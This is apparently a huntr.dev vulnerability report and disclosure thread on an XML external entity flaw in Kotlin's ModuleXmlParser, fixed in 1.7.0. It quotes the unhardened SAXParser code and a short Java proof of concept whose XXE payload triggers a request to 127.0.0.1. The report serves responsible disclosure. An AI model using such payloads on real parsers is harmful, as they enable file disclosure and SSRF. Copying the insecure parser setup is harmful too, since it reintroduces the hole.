Improper Restriction of XML External Entity Reference in jetbrains/kotlin

Valid

Reported on

Jan 15th 2022


Description

The ModuleXmlParser.parse() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/JetBrains/kotlin/blob/1274e2b90a2da93a745f1417b2ae3822809304be/compiler/cli/cli-common/src/org/jetbrains/kotlin/cli/common/modules/ModuleXmlParser.java#L88

        SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(xml, new DelegatedSaxHandler() {
                @NotNull
                @Override
                protected DefaultHandler getDelegate() {
                    return currentState;
                }
            });
            return new ModuleChunk(modules);

Proof of Concept

Extracted out the key function mentioned above to showcase how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;

public class Poc {

    public static void main(String[] args) {        
        try {
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Causes an SSRF to http://127.0.0.1

Impact

This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.

We are processing your report and will contact the jetbrains/kotlin team within 24 hours. 2 years ago
We have contacted a member of the jetbrains/kotlin team and are waiting to hear back 2 years ago
We have sent a follow up to the jetbrains/kotlin team. We will try again in 4 days. 2 years ago
We have sent a second follow up to the jetbrains/kotlin team. We will try again in 7 days. 2 years ago
We have sent a third follow up to the jetbrains/kotlin team. We will try again in 14 days. 2 years ago
ready-research
2 years ago

Researcher


@admin I have raised an issue in JetBrains form https://youtrack.jetbrains.com/issue/KT-51519, You can check the flag security issue and fixed label.

For confirmation, we can refer to the KT-51519 Fixed label in the fix message. https://github.com/JetBrains/kotlin/commit/9c78d57de27ec9c561f8aa943033463129113a56

Can you please validate this issue as valid based on the above information? Thanks.

Jamie Slome
2 years ago

@ready-research - it looks like the URL that you shared is not public.

We would need some form of confirmation from the maintainers that this report itself was used to notify the maintainers about the vulnerability.

Have you shared this URL with them directly?

ready-research
2 years ago

Researcher


@admin Okay. While raising the security issue https://youtrack.jetbrains.com/issue/KT-51519, I have specifically mentioned the below "I originally reported this in huntr https://www.huntr.dev/bounties/e9b2b1dd-ab65-48e2-8042-b53253649961/ But we didn't get any response. So creating a security issue. Thanks."

Jamie Slome
2 years ago

@ready-research - I have dropped a comment on the commit SHA, and we will wait to see if we get a response from the maintainer ūüĎć

A jetbrains/kotlin maintainer validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
A jetbrains/kotlin maintainer marked this as fixed in 1.7.0 with commit 9c78d5 2 years ago
The fix bounty has been dropped
ModuleXmlParser.java#L88 has been validated
to join this conversation